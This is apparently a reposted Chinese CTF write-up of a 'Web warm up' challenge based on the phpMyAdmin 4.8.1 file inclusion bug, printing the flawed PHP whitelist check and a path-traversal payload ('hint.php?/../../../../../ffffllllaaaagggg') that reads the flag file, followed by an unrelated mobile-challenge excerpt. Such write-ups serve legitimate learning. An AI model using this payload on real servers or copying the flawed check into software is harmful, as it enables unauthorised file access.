摘要:这个题目原型是的任意文件包含漏洞发现源码不为空是字符串上面定义的方法返回值为真
[toc]
Web warm up这个题目原型是phpmyadmin4.8.1的任意文件包含漏洞
发现源码
"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can"t see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . "?", "?") ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . "?", "?") ); if (in_array($_page, $whitelist)) { return true; } echo "you can"t see it"; return false; } } if (! empty($_REQUEST["file"]) 不为空 && is_string($_REQUEST["file"]) 是字符串 && emmm::checkFile($_REQUEST["file"]) 上面定义的checkfile方法返回值为真 ) { include $_REQUEST["file"]; exit; } else { echo "
"; } ?>
payloadhint.php?/../../../../../ffffllllaaaagggg
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/31727.html
摘要:第二题返老还童拿到之后丢进,发现只有,代码,没有。仔细观察发现,以上坐标可以对应坐标系中的一个九宫格。有点脑洞,把九个坐标编好数字,然后按照坐标给出的顺序写数字就是答案。 Mobile 第二题:返老还童(1000pt) 拿到apk之后丢进JEB,发现只有.class,java代码,没有so。整个apk的class文件结构如下: a.a.a com.reverse.daydayup.a ...
阅读 2079·2021-10-08 10:21
阅读 2472·2021-09-29 09:34
阅读 3495·2021-09-22 15:51
阅读 4929·2021-09-22 15:46
阅读 2316·2021-08-09 13:42
阅读 3437·2019-08-30 15:52
阅读 2724·2019-08-29 17:13
阅读 1556·2019-08-29 11:30